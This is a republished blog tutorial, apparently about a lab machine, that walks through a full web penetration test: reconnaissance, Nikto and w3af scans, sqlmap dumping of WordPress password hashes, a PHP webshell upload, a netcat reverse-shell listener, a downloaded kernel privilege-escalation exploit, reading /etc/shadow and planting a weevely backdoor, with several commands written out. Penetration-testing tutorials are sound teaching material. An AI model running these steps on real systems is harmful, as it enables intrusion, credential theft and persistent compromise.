BestHub
Sign in
Information Security 10 min read

Step‑by‑Step Web Penetration Test: From Recon to Root Access

This tutorial walks you through a complete web penetration test on the fictional site hack‑test.com, covering DNS enumeration, server fingerprinting, vulnerability scanning with Nikto and w3af, exploiting SQL injection via sqlmap, uploading a PHP webshell, gaining a reverse shell, and finally escalating to root privileges on a Linux server.

Open Source Linux
Open Source Linux
Open Source Linux
Step‑by‑Step Web Penetration Test: From Recon to Root Access

Through this guide you will learn the typical workflow of a hacker when attacking a website, starting with simple information gathering and ending with full root compromise.

1. Information gathering

Use ping to resolve the domain hack-test.com to IP 173.236.138.113. Query sameip.org to list other sites on the same IP (26 sites shown in a table).

Retrieve DNS records with who.is and display the results (image omitted for brevity).

2. Server identification

Run whatweb (Backtrack 5) to discover that the web server is Apache. Determine the version and operating system (Fedora Linux, Apache 2.2.15) using whatweb output (images shown).

3. Port scanning

Use nmap to scan open ports; only port 80 is open.

4. Vulnerability scanning

Run nikto against the target:

root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com

Run w3af GUI for a full security audit (screenshots omitted).

5. Exploiting SQL injection

Identify a vulnerable URL http://hack-test.com/Hackademic_RTB1/?cat=d%27z%2220. Use sqlmap to enumerate databases, tables, and dump the wp_users table:

sqlmap -u "http://hack-test.com/Hackademic_RTB1/?cat=d%27z%2220" --dbs

Extract user_login and user_pass hashes, then crack them via an online hash‑cracking service.

6. Uploading a PHP webshell

Upload a malicious PHP file through the vulnerable WordPress plugin (e.g., Textile) and gain command execution on the server.

7. Getting a reverse shell

Listen on local port 5555 with nc -lvp 5555. From the webshell, initiate a reverse connection to the attacker’s IP and port.

8. Privilege escalation

Identify kernel version 2.6.31.5-127.fc12 and locate an exploit on Exploit‑DB (ID 15285). Download and compile the C exploit:

wget http://www.exploit-db.com/exploits/15285 -O roro.c
#include <stdio.h>
/* ... truncated C source ... */
int prep_sock(int port) { /* socket preparation code */ }

Compile and execute:

gcc roro.c -o roro
./roro

After successful exploitation, run id and obtain uid=0(root) gid=0(root).

9. Post‑exploitation

Read /etc/shadow to obtain password hashes, optionally crack them with john or hashcat. Deploy a persistent backdoor using weevely: ./weevely.py -g -o hax.php -p koko Upload hax.php to the server and interact with it:

./weevely.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko

The tutorial ends with a disclaimer that the content is sourced from the internet and belongs to the original authors.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

SQL injectionWeb Securityprivilege escalationpenetration testingInformation Gatheringreverse shell
Open Source Linux
Written by

Open Source Linux

Focused on sharing Linux/Unix content, covering fundamentals, system development, network programming, automation/operations, cloud computing, and related professional knowledge.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment